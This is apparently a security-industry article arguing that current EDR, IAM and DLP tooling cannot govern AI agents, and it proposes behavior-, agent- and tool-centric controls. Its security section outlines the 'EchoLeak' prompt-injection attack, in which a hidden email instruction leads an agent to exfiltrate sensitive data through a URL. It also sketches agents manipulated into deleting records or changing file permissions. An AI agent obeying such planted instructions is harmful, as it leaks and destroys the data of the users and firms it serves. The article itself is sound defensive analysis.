The Modern Security and Governance Stack Isn’t Ready for AI Agents
Agents aren’t users, non-human identities, APIs, or service accounts that our current tooling covers
Several CISOs I’ve talked to about agent security and governance are rightfully skeptical about all this agent hype. After all, we’ve seen this movie before.
The security market sees “paradigm shifts” every other week. Markets get hyped, tools get bought, and that incredible next generation of security turns out to be shelfware or simply more alerts for analysts in the SOC.
Instead of getting caught up in the hype, the first and correct inclination is to think about whether current tooling can already handle the “next big thing.” While this impulse is often the right move, the unique characteristics of agents suggest a more nuanced reality. So let's examine why agents might warrant a closer look and why that matters.
Agents are a new class of autonomous logic that exists across operating planes—from the endpoint to the cloud and within your applications. The challenge with leveraging current tools is that they were built on foundations that are fundamentally incongruous with this new actor in the enterprise.
Today, our security is host-centric, our governance is user-centric, and our data protection is exfiltration-centric.
Agents defy these foundational assumptions upon which our tools operate today. We don’t just have a feature gap; instead, we have an architectural mismatch.
To be ready for agents, we need to expand our capabilities beyond our traditional foundations:
Our security must expand from host-centric to also become behavior-centric.
Our governance must expand from user-centric to also become agent-centric.
Our data protection must expand from exfiltration-centric to also become tool-centric.
Architectural Mismatches
The modern security and governance stack is quite effective for humans, non-human identities, static service accounts, and applications:
Host-centric tooling (EDR/XDR) enables us to monitor our hosts and endpoints to detect and stop anomalous behavior.
User-centric tooling (IAM/PAM) enables us to log and audit every user interaction with our applications and data.
Exfiltration-centric tooling (DLP/CASB) enables us to prevent sensitive data from being exfiltrated from the enterprise.
These foundational approaches are woven into today’s modern platforms like CNAPPs and SSEs. Together, this suite of capabilities represents our traditional method for addressing these three core pillars of risk management: security, governance, and data protection.
Enter the Agents
At their core, agents introduce risk not because of what they are, but because of how they behave. As Anton Chuvakin noted in “How Google secures AI Agents”, agents don’t act like other software:
“Securing AI agents is inherently challenging due to four factors:
Unpredictability (non-deterministic nature)
Emergent behaviors [Author’s note: unexpected actions or outcomes from an agent's interactions]
Autonomy in decision-making
Alignment issues (ensuring actions match user intent)”
This agent disruption can be summarized by looking at our three core pillars: security, governance, and data protection. The table below outlines how the traditional foundation for each is challenged by agents, and introduces the new, expanded foundation required to govern them effectively as we analyze each pillar row by row.
Security: Expanding Host-Centric (EDR/XDR) to Include a Behavior-Centric Approach
Host-centric tooling like EDR/XDR excels at finding malicious processes on endpoints. However, when confronted with AI agents, this foundation reveals several blind spots:
There is no endpoint to monitor for a serverless agent. For example, an e-commerce agent that processes customer returns can be triggered by a photo upload to cloud storage. The agent then makes a series of API calls to different services to authorize the return and ship a replacement. This entire workflow runs in the cloud provider's infrastructure, with no traditional host where an EDR/XDR agent can be installed to monitor the agent's logic or actions.
EDR/XDR are blind to logic-based attacks. As the recently publicized “EchoLeak” agent attack demonstrated, a hidden instruction in an email can trick an agent into embedding sensitive data into a URL and exfiltrating it, all without a single click from the user, a malicious file being executed, or a malicious process running on the host for EDR/XDR to detect.
Agents make behavioral analytics (UEBA) unreliable. A UEBA tool that has learned a human's 9-to-5 behavior will be flooded with false positives when an autonomous agent uses that same account to perform thousands of legitimate API calls at 3 AM. The tool is baselining the wrong actor, creating noise that makes it extremely difficult to spot a real threat.
In order to address these issues we need tools that can be behavior-centric, meaning that they can understand the full context of an agent's actions (such as the user, the agent's identity, its specific task, and the tools it is using) to make a security decision, regardless of where the agent is running.
In the EchoLeak example, a behavior-centric tool might have stopped the attack by seeing the full picture. Unlike an EDR that just sees a normal, authorized browser call, a behavior-centric tool would have first identified the agent attempting the risky combination of an untrusted external email influencing a sensitive internal document. By analyzing the agent's entire context, from its inputs to its outputs, the tool could have detected the sensitive data being embedded into the exfiltration URL and blocked the malicious action before any data was lost.
Governance and Audit: Expanding User-Centric (IAM/PAM) to Include an Agent-Centric Model
User-centric tooling like IAM is the bedrock of our governance programs, designed to ensure only authorized users can access specific resources and to create an audit trail of their interactions. Agents challenge this foundation in the following ways:
Agents fundamentally break the chain of user attribution. When an agent acts using a human’s credentials, the audit log blames the human. It becomes extremely difficult to prove if a destructive action was a malicious choice by the user or an error by the agent, making compliance reviews and forensic analysis fundamentally unreliable. Identity leaders are making this clear as well:
Okta notes, “Traditional authentication methods weren’t built for AI-driven applications, leaving gaps in control and accountability.”
1Password states, “Legacy IAM, IGA, and MDM tools were built for people and devices—not autonomous software. They assume interactive logins, static access patterns, and human oversight. AI agents don’t fit this model.”
Agents aren’t like traditional non-human identities or service accounts. It's tempting to treat agents like the service accounts we use for simple automation. But a service account runs a predictable, deterministic script, like a train on a track. An autonomous agent is like a self-driving car, capable of making its own decisions and exhibiting emergent, unpredictable behaviors. Governing a self-driving car with a train schedule and a static set of permissions is inadequate.
In order to solve this attribution challenge, we need a governance model that is agent-centric. We need to treat each agent as a distinct, governable identity–separate from its human user–and provide a verifiable chain of command for each agent’s actions.
By logging every action to the agent’s unique ID, it becomes clear whether behavior is the user’s or the agent’s. Likewise, by treating an agent as distinct from a non-human identity or service account, we can protect the agent from being overpermissioned by applying dynamic, task-based policies that grant it the least privilege required to perform a specific action, rather than assigning it the broad, static permissions typical of a service account.
Data Protection: Expanding Exfiltration-Centric (DLP/CASB) to Include Tool-Centric Controls
Exfiltration-centric tools like Data Loss Prevention (DLP) and Cloud Access Security Brokers (CASB) form a critical part of our data protection strategy. These tools are gatekeepers at the perimeter, whether the network edge or the border of a SaaS application, to identify sensitive data and prevent it from leaving our control. This focus on the boundary, however, leaves significant gaps when confronted with autonomous agents:
DLP tools are blind to internal agent misuse and sabotage. The most destructive action an agent can take may not involve stealing data but misusing it internally. For example, a data management agent could be manipulated into incorrectly deleting or corrupting thousands of customer records inside a production database. Because no sensitive data crosses a monitored perimeter, exfiltration-centric tools are unaware of this harmful activity. This shifts the definition of data protection beyond data theft to include data misuse and unauthorized actions taken on behalf of the enterprise.
CASBs only govern access to an application, not specific actions within it. A CASB may correctly grant an agent access to SharePoint based on the user's permissions. However, the CASB can’t distinguish between the agent performing its approved task (say, summarizing a report) versus being tricked into performing a malicious action (like changing the permissions on a sensitive file or deleting it). The CASB authorizes the entire session but lacks the granular visibility to police the agent's specific behavior inside that session.
To protect data from misuse, not just theft, we need an approach that is tool-centric to move the point of control from the perimeter to the action itself. We can then govern the specific tools an agent is allowed to use, whether APIs, functions, applications, or databases, as well as the conditions under which it’s allowed to perform its task.
In our data management agent example, a tool-centric approach would not just see data being accessed. It would intercept the agent’s specific attempt to use function calls on the data and enforce a policy like,”This agent is not authorized to execute delete commands on a production database," or "This type of data modification requires human-in-the-loop approval." We then get defense-in-depth by not only watching the perimeter for theft with DLP but blocking destructive behavior to protect data integrity.
Towards A New Foundation for Agents
As we've seen, the introduction of agents reveals new architectural gaps across our security and governance stack. Our host-centric security wasn't designed to interpret agent logic, our user-centric governance requires a new model for agent attribution, and our exfiltration-centric data protection wasn't built to oversee complex internal actions.
Taken together, agents aren’t simply a feature or an incremental update. Agents force us to rethink our entire stack because they are a new, human-like partner to govern that operate beyond our traditional operating planes.
As we incorporate agents into our workforce, we also need to ground them in our the helpful frameworks that we already use to measure our current programs. The architectural gaps we've discussed are, in effect, new challenges to the core functions of the NIST Cybersecurity Framework (CSF)—our ability to Identify, Protect, Detect, Respond, and Recover. Aligning these new behavior-centric, agent-centric, and tool-centric controls with the guidance in the NIST AI Risk Management Framework (RMF) is a clear path forward. Mapping these capabilities back to specific NIST controls is a critical exercise for every security leader.